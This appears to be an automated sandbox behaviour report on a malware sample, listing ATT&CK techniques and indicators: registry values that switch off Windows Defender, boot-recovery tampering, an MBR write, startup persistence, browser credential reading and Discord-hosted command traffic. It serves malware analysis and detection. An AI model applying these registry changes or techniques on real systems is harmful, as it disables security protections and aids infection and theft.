hxxp://wisegex[.]com

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

3888 bcdedit.exe
3260 bcdedit.exe
4872 bcdedit.exe
1652 bcdedit.exe

pid	process
3888	bcdedit.exe
3260	bcdedit.exe
4872	bcdedit.exe
1652	bcdedit.exe

Nirsoft 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\s.exe	Nirsoft

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exepowershell.exe

flow pid process

414 4196 mshta.exe
416 4196 mshta.exe
418 4196 mshta.exe
517 2080 powershell.exe
592 2292 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

flow	pid	process
414	4196	mshta.exe
416	4196	mshta.exe
418	4196	mshta.exe
517	2080	powershell.exe
592	2292	powershell.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

cmd.execmd.exeWScript.exeWScript.exeWScript.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 4 IoCs

Processes:

attrib.execscript.exeattrib.execscript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk	cscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk	cscript.exe

Executes dropped EXE 64 IoCs

Processes:

System.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exe

pid	process
868	System.exe
5704	System.exe
212	System.exe
4316	System.exe
3292	System.exe
3692	System.exe
4100	System.exe
5020	System.exe
1892	System.exe
6136	System.exe
5000	System.exe
1168	System.exe
3916	System.exe
4924	System.exe
2172	System.exe
3692	System.exe
3472	System.exe
4944	System.exe
5836	System.exe
5356	System.exe
2284	System.exe
5672	System.exe
4376	System.exe
2028	System.exe
3772	System.exe
4316	System.exe
1448	System.exe
2660	System.exe
448	System.exe
4700	System.exe
5684	System.exe
4460	System.exe
4552	System.exe
5584	System.exe
3652	System.exe
5704	System.exe
5732	System.exe
1292	System.exe
3772	System.exe
5220
1292
5356
3180
1684
3772
868
3444
2936
3116
5676
4572
1688
896
5852
2808
5004
3392
5964
5576
1648
5000
5424
1884
4692

Loads dropped DLL 8 IoCs

Processes:

MsiExec.exeMsiExec.exeMsiExec.exeWScript.exe

pid process

4948 MsiExec.exe
4948 MsiExec.exe
6044 MsiExec.exe
6044 MsiExec.exe
5560 MsiExec.exe
3476
3292 WScript.exe
3772
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4948	MsiExec.exe
4948	MsiExec.exe
6044	MsiExec.exe
6044	MsiExec.exe
5560	MsiExec.exe
3476
3292	WScript.exe
3772

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

MsiExec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ = "C:\\Program Files\\AESCrypt\\AESCrypt.dll"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ThreadingModel = "Apartment"	MsiExec.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe	upx
behavioral1/memory/868-3146-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/868-3149-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5704-3150-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5704-3154-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/212-3155-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/212-3158-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4316-3159-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4316-3162-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3292-3163-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3292-3167-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3692-3168-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3692-3171-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4100-3172-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4100-3176-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5020-3177-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5020-3181-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1892-3185-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/6136-3186-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/6136-3189-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5000-3192-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1168-3196-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3916-3197-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3916-3200-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4924-3201-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4924-3205-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2172-3208-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3692-3211-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3472-3212-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3472-3216-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4944-3217-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4944-3221-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5836-3222-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5836-3225-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5356-3229-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2284-3232-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5672-3235-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4376-3238-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2028-3239-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2028-3242-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3772-3243-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3772-3247-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4316-3354-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1448-3358-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2660-3359-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/2660-3362-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/448-3363-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/448-3367-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4700-3369-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5684-3371-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4460-3383-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4460-3385-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4552-3397-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/4552-3399-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5584-3407-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3652-3416-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5704-3426-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5732-3432-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/5732-3439-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1292-3446-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1292-3451-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3772-3459-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/3772-3465-0x0000000000400000-0x0000000000625000-memory.dmp	upx
behavioral1/memory/1292-3490-0x0000000000400000-0x0000000000625000-memory.dmp	upx

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

Processes:

flow	ioc
536	discord.com
635	discord.com
686	discord.com
710	discord.com
681	discord.com
707	discord.com
522	discord.com
556	discord.com
615	discord.com
619	discord.com
629	discord.com
665	discord.com
168	camo.githubusercontent.com
550	discord.com
581	discord.com
601	discord.com
660	discord.com
678	discord.com
544	discord.com
572	discord.com
574	discord.com
588	discord.com
593	discord.com
623	discord.com
675	discord.com
683	discord.com
598	discord.com
627	discord.com
657	discord.com
734	discord.com
837	raw.githubusercontent.com
547	discord.com
591	discord.com
666	discord.com
672	discord.com
679	discord.com
731	discord.com
530	discord.com
532	discord.com
551	discord.com
631	camo.githubusercontent.com
663	discord.com
682	discord.com
708	discord.com
613	discord.com
621	discord.com
622	discord.com
728	discord.com
587	discord.com
612	discord.com
626	discord.com
677	discord.com
836	raw.githubusercontent.com
662	discord.com
534	discord.com
571	discord.com
594	discord.com
595	discord.com
600	discord.com
603	discord.com
596	discord.com
630	discord.com
174	camo.githubusercontent.com
543	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

516 api.ipify.org
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

description ioc process

File opened for modification \??\PhysicalDrive0

flow	ioc
516	api.ipify.org

description	ioc	process
File opened for modification	\??\PhysicalDrive0

Drops file in System32 directory 11 IoCs

Processes:

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx

Drops file in Program Files directory 3 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Program Files\AESCrypt\AESCrypt.dll	msiexec.exe
File created	C:\Program Files\AESCrypt\aescrypt.exe	msiexec.exe
File created	C:\Program Files\AESCrypt\AESCrypt32.exe	msiexec.exe

Drops file in Windows directory 22 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcp100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File created	C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_853F67D554F05449430E7E.exe	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{562885D3-41A7-4211-822E-B1B1510069E5}	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcr100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_atl100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File opened for modification	C:\Windows\Installer\e5927f1.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI29B7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_853F67D554F05449430E7E.exe	msiexec.exe
File created	C:\Windows\Installer\e5927f3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI285E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcp100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_atl100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0	msiexec.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcr100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC	msiexec.exe
File created	C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_112D608FD02CD87FDC7735.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_112D608FD02CD87FDC7735.exe	msiexec.exe
File created	C:\Windows\Installer\e5927f1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2AE1.tmp	msiexec.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

vssvc.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b7d72a8ac39dc2e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b7d72a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b7d72a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db7d72a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b7d72a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4288
2496
3832
928
2060	timeout.exe
2264
2728
2364
4456
4744
4496
5216
3628
5368
4440	timeout.exe
3252
5032
3708
3824
4256	timeout.exe
5224	timeout.exe
5216	timeout.exe
5044
4936
4692	timeout.exe
2808
3760
3760	timeout.exe
2040
5196
6140	timeout.exe
2924	timeout.exe
2540
4468
5128
812
4976
5684	timeout.exe
3544	timeout.exe
3252	timeout.exe
5196
5856
3900
3288
3668
6096	timeout.exe
5828
3540
3256
2180
1252
4460	timeout.exe
1252
2096
5228
4084
5456	timeout.exe
2088	timeout.exe
6100
408
952	timeout.exe
4520	timeout.exe
1892	timeout.exe
4196

Enumerates processes with tasklist 1 TTPs 7 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5220
2164
3544 tasklist.exe
1532 tasklist.exe
5536
5300
4456
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

4924 ipconfig.exe
3832 ipconfig.exe
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

1748 systeminfo.exe
4256 systeminfo.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5232 taskkill.exe
4536 taskkill.exe
2164 taskkill.exe
4868 taskkill.exe
1344
2960
5260

pid	process
5220
2164
3544	tasklist.exe
1532	tasklist.exe
5536
5300
4456

pid	process
4924	ipconfig.exe
3832	ipconfig.exe

pid	process
1748	systeminfo.exe
4256	systeminfo.exe

pid	process
5232	taskkill.exe
4536	taskkill.exe
2164	taskkill.exe
4868	taskkill.exe
1344
2960
5260

Modifies data under HKEY_USERS 3 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe

Modifies registry class 59 IoCs

Processes:

msiexec.exeMsiExec.execmd.execmd.exemsedge.execmd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.aes\Content Type = "application/aes"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AESCrypt.DLL	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ = "C:\\Program Files\\AESCrypt\\AESCrypt.dll"	MsiExec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Version = "50987008"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\ = "AES Crypt Encrypted Data File"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}	MsiExec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Media\1 = ";"	msiexec.exe
